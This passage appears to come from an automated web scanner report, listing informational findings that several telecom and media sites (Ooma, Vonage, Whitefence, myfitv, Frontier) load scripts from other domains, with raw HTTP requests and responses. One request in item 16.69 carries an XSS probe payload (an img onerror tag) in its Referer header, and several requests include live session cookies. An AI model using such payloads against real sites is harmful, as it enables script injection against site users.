Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.143.63
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:43 GMT
Content-Length: 15660

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="qvEJ";</scri
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/VOkpxDXgCrn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
...[SNIP]...

16.59. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?api_key=210163452329780&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25493d93%26origin%3Dhttp%253A%252F%252Fwww.myfitv.com%252Ffe3b14c2c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=false&height=254&href=http%3A%2F%2Fwww.facebook.com%2Fmyfitv&locale=en_US&sdk=joey&show_faces=true&stream=false&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.139.32
X-Cnection: close
Date: Tue, 06 Sep 2011 12:45:41 GMT
Content-Length: 12771

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox</title>
<link type="text/css" rel="stylesheet" href="h
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/te2emPSgfVn.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js"></script>
...[SNIP]...

16.60. http://www.fairpoint.com/residential/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fairpoint.com
Path:   /residential/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /residential/ HTTP/1.1
Host: www.fairpoint.com
Proxy-Connection: keep-alive
Referer: http://www.fairpoint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24578CF2F7156AB48FCFDA58BB99F9A0; __utma=35652279.1641746484.1315328322.1315328322.1315328322.1; __utmc=35652279; __utmz=35652279.1315328322.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fp_audience=residential; fp_state=VT; fp_city=Westfield; newloc=1; fp_zip=05874; fp_telco=NNE-VT

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:11 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_jk/1.2.23
Set-Cookie: activeBU=Residential; Expires=Tue, 06-Sep-2011 14:10:45 GMT; Path=/
Content-Type: text/html
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<link re
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

16.61. http://www.frontier.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; ASP.NET_SessionId=ks40bd45i0qr22450as2ev2m; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 21531


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="icon" href="h
...[SNIP]...
</title><script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript" ></script>
...[SNIP]...
<!-- Begin: www.iperceptions.com -->
<script src="http://ips-invite.iperceptions.com/webValidator.aspx?sdfc=9014a8fa-937-a77aeb94-4e7a-4e23-a045-ac680a9b8baa&lID=1&loc=STUDY&cD=90&rF=False&iType=1&domainname=0" type="text/javascript" defer="defer" ></script>
...[SNIP]...

16.62. http://www.myfitv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fitvuser=fitvuser_etiamsodalesorciat; _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.1.10.1315330191; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:45:29 GMT
ETag: "1c6dae7fdca3cc1a86a9e8a293c50cc1"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; path=/; HttpOnly
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.123781
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 77353
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
<!-- Facebook Javascript SDK End -->

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...

16.63. http://www.myfitv.com/portal/recent_tv_elastic

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /portal/recent_tv_elastic

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /portal/recent_tv_elastic HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:29:50 GMT
ETag: "2698e5fdf58407cf7613e37e2b5b9b8c"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIh4vcG9ydGFsL3JlY2VudF90dl9lbGFzdGljIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--c52e71f8ca5af51eeea0a0e4a1cfca90223f19ea; path=/; HttpOnly
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 0.026102
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 29645
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Yahoo Portal Module</title>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...

16.64. http://www.myfitv.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfitv.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search?utf8=%E2%9C%93&query=xss HTTP/1.1
Host: www.myfitv.com
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIgYvIg9zZXNzaW9uX2lkIiU0YmU1YTM3MTJhNTEzNTZlOTc2N2FkZTBmZDgwZDUwOA%3D%3D--aa39b7ec689c86dc7e31508ecf939cd7c8041346; fitvuser=fitvuser_etiamsodalesorciat; __qca=P0-216653065-1315331121961; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=158259878.1724469212.1315330191.1315330191.1315330191.1; __utmb=158259878.4.9.1315331433305; __utmc=158259878; __utmz=158259878.1315330191.1.1.utmcsr=frontier.my.yahoo.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=158259878.visitor|1=Arrived=2011-09-06=1

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, private, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Tue, 06 Sep 2011 12:50:36 GMT
ETag: "b06b1c86b03c05bca43a7628c5a0a319"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.4
Set-Cookie: fitvuser=fitvuser_etiamsodalesorciat; path=/
Set-Cookie: _frontiertv_session=BAh7ByIOcmV0dXJuX3RvIiUvc2VhcmNoP3V0Zjg9JUUyJTlDJTkzJnF1ZXJ5PXhzcyIPc2Vzc2lvbl9pZCIlNGJlNWEzNzEyYTUxMzU2ZTk3NjdhZGUwZmQ4MGQ1MDg%3D--93112ebe330134a19c07b42f1f52e133e4c4f31d; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.4
X-Runtime: 1.106563
X-UA-Compatible: IE=Edge,chrome=1
Content-Length: 30810
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   
<script type="text/javascript">
// setting g
...[SNIP]...
<!-- Facebook Javascript SDK End -->

<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-7elq8ZYievA_s&callback=qc_results" ></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- Yahoo Retargeting -->
<script src='http://adreadytractions.com/rt/233231?p=8831'></script>
...[SNIP]...

16.65. http://www.ooma.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Last-Modified: Tue, 06 Sep 2011 11:25:09 GMT
ETag: "4f66dd53eaae6abc866a12e1c38377e7"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 19669
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://Ooma.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.66. http://www.ooma.com/premier

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /premier

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /premier HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; has_js=1; __utmx=238888606.; __utmxx=238888606.; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.1.10.1315327926; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; _chartbeat2=qemhbgfmeo01qhct.1315327925630

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Last-Modified: Tue, 06 Sep 2011 11:32:28 GMT
ETag: "c7b25363aeb081cef4cc76ffe8e76ca0"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 14659
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://Ooma.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"></script>
...[SNIP]...
<img src="http://r.casalemedia.com/r?u=155828" width="1" height="1" alt="" />
<script type="text/javascript" src="http://beacon.dedicatednetworks.com/js/t.aspx?aid=084BF99942C00D12">
</script>
...[SNIP]...
</noscript>
<script src="http://ads.lucidmedia.com/clicksense/pixel?id=100842&t=s"></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.67. http://www.ooma.com/premier/features

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ooma.com
Path:   /premier/features

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /premier/features HTTP/1.1
Host: www.ooma.com
Proxy-Connection: keep-alive
Referer: http://www.ooma.com/premier
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS7755cd8bc8424ab1d27f14d04d5a5a56=npu0136i2olrdchgh3cn570or2; __utmx=238888606.; __utmxx=238888606.; has_js=1; __utma=257238996.1845384337.1315327926.1315327926.1315327926.1; __utmb=257238996.2.10.1315327926; __utmc=257238996; __utmz=257238996.1315327926.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; _chartbeat2=qemhbgfmeo01qhct.1315327925630

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Last-Modified: Tue, 06 Sep 2011 12:26:14 GMT
ETag: "a2e607b451d833089a1b580389cc203e"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Length: 32669
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...
</script>
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"></script>
<script language="JavaScript" src="http://Ooma.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"></script>
...[SNIP]...
</script>
           <script type="text/javascript" src="https://edge.quantserve.com/quant.js"></script>
...[SNIP]...

16.68. http://www.vonage.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vonage.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Expires: Mon, 13 Nov 1996 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 11:52:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42201

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--iPerceptions-->
<script type="text/javascript" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_layer_Invitation_722.js"></script>
...[SNIP]...

16.69. http://www.whitefence.com/404.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /404.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /404.html HTTP/1.1
Host: www.whitefence.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet23bef%22%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3Eaffc43fb5c2/
Cookie: PHPSESSID=b5g3jlvu9jqg4vvgfhk6r1grh3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:02:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 47389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<meta name="google-site-verification" content="p2XZph2E52nUsdioUNHg56J1Qa5oNYY8AmcLs_Veju8" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yuiloader-dom-event/yuiloader-dom-event.js&2.5.2/build/selector/selector-beta-min.js"></script>
...[SNIP]...

16.70. http://www.whitefence.com/category/high-speed-internet/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<meta name="google-site-verification" content="p2XZph2E52nUsdioUNHg56J1Qa5oNYY8AmcLs_Veju8" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yuiloader-dom-event/yuiloader-dom-event.js&2.5.2/build/selector/selector-beta-min.js"></script>
...[SNIP]...

16.71. http://www.whitefence.com/category/home-phone/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:54 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<meta name="google-site-verification" content="p2XZph2E52nUsdioUNHg56J1Qa5oNYY8AmcLs_Veju8" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.5.2/build/yuiloader-dom-event/yuiloader-dom-event.js&2.5.2/build/selector/selector-beta-min.js"></script>
